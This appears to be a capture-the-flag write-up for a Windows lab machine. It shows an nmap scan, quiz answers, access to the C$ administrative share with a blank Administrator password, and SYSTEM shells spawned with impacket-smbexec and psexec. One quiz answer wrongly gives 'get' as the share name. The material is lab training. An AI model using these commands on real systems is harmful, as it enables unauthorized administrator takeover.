Target IP Address: 10.129.25.16
Recon
└──╼ [★]$ nmap -sC -sV -T4 -max-rate 5000 -vv -p- -oN initial_recon.txt 10.129.25.16Result:
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 42293/tcp): CLEAN (Timeout)
| Check 2 (port 15094/tcp): CLEAN (Timeout)
| Check 3 (port 28697/udp): CLEAN (Timeout)
| Check 4 (port 42482/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-04-12T05:44:40
|_ start_date: N/A
|_clock-skew: -1s- Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall? Ans:
-Pn - What does the 3-letter acronym SMB stand for? Ans:
Server Message Block - What default port does SMB listen on? Ans:
445 - What command line argument do you give to
smbclientto list available shares? Ans:-L
Recon SMBClient
└──╼ [★]$ smbclient -L 10.129.25.16 -U Administrator
Password for [WORKGROUP\Administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.25.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available- What character at the end of a share name indicates it’s an administrative share? Ans:
$ - Which Administrative share is accessible on the box that allows users to view the whole file system? Ans:
get - What command can we use to download the files we find on the SMB Share? Ans:
get
Foothold
Using SMB Client
Getting into smb via smbclient:
└──╼ [★]$ smbclient \\\\10.129.25.16\\C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \>
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
. DR 0 Thu Apr 22 02:16:03 2021
.. DR 0 Thu Apr 22 02:16:03 2021
desktop.ini AHS 282 Wed Apr 21 10:23:32 2021
flag.txt A 32 Fri Apr 23 04:39:00 2021
...
smb: \Users\Administrator\Desktop\> get flag.txtUsing impacket
You can also use impacket collection to spawn a shell:
└──╼ [★]$ impacket-smbexec -shell-type powershell -no-pass [email protected]
Impacket v0.13.0.dev0
...
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd ~
[-] You can't CD under SMBEXEC. Use full paths.Oops. Looks like I have the wrong impacket tool. We could use psexec instead:
└──╼ [★]$ impacket-psexec -no-pass [email protected]
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.25.16.....
[*] Found writable share ADMIN$
[*] Uploading file IItHjMcz.exe
[*] Opening SVCManager on 10.129.25.16.....
[*] Creating service diSd on 10.129.25.16.....
[*] Starting service diSd.....
[!] Press help for extra shell commandsUsing spawned shell, we can look for the flag.txt found in C:\Users\Administrator\Desktop:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd \Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
...
Directory of C:\Users\Administrator\Desktop
04/22/2021 12:16 AM <DIR> .
04/22/2021 12:16 AM <DIR> ..
04/23/2021 02:39 AM 32 flag.txt
1 File(s) 32 bytes
2 Dir(s) 4,746,768,384 bytes free